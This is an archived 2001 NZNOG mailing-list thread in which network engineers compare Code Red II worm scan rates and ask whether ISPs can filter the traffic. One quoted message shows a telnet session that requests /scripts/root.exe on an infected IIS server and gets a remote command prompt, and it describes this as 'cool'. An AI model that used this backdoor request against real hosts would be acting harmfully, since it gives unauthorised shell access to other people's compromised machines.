489 here. Same ISP. I suppose a lot of IP's in our class A are infected? At 12:59 6/08/2001 +1200, Juha Saarinen wrote:
431 attempts so far.
Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?
--
Juha
:: -----Original Message----- :: From: owner-nznog(a)list.waikato.ac.nz :: [mailto:owner-nznog(a)list.waikato.ac.nz] On Behalf Of :: mat(a)voyager.co.nz :: Sent: Monday, 6 August 2001 12:52 :: To: nznog(a)list.waikato.ac.nz :: Subject: Re: Different Code Red? :: :: :: Hi all :: :: I have looked on our router and am seeing upto 100 attempts :: per minute from :: Code Red Vers. II virus scanning our network looking for :: other machines to :: infect. :: :: Is anyone else seeing such a high scan rate? :: :: Can anything be done about it? :: :: Over the last 3 hours, the frequency of attempts increased by 50%. :: :: :: :: :: At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote: :: >On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote: :: > :: > It's a new worm using the same infection vector. It is :: a lot more :: > aggressive, and uses the fact that machines near to itself are :: > likely to be good places to find crackable machines. :: If you have :: > a lot of customers with cracked NT boxes you'll get a lot of :: > scans. If you have a nice C space in the middle of nowhere with :: > no windows machines anywhere near, you might have a :: rather boring :: > night. :: > :: >Hey, and it leaves a cool backdoor floating about. Look for recent :: >infectors and telnet to them like such: :: > :: >cw:0(a)weta(cw)$ telnet x.x.x.x 80 :: >Trying x.x.x.x... :: >Connected to x.x.x.x. :: >Escape character is '^]'. :: >get /scripts/root.exe HTTP/0.9 :: > :: >HTTP/1.1 200 OK :: >Server: Microsoft-IIS/5.0 :: >Date: Sun, 05 Aug 2001 11:39:46 GMT :: >Content-Type: application/octet-stream :: >Microsoft Windows 2000 [Version 5.00.2195] :: >(C) Copyright 1985-1999 Microsoft Corp. :: > :: >c:\inetpub\scripts> :: > :: > :: > :: >Cool :) :: > :: >Start grepping those proxy logs people for lusers attempting to do :: >this (it won't work via a proxy anyhow, but that's no reason not to :: >hunt down the offending luser and beat them senseless). :: > :: > :: > --cw :: >--------- :: >To unsubscribe from nznog, send email to :: majordomo(a)list.waikato.ac.nz :: >where the body of your message reads: :: >unsubscribe nznog :: > :: > :: Matt Law :: Network Engineer :: Voyager NZ Ltd :: DDI +649 4439 443 :: PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc :: --------- :: To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz :: where the body of your message reads: :: unsubscribe nznog :: ::
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog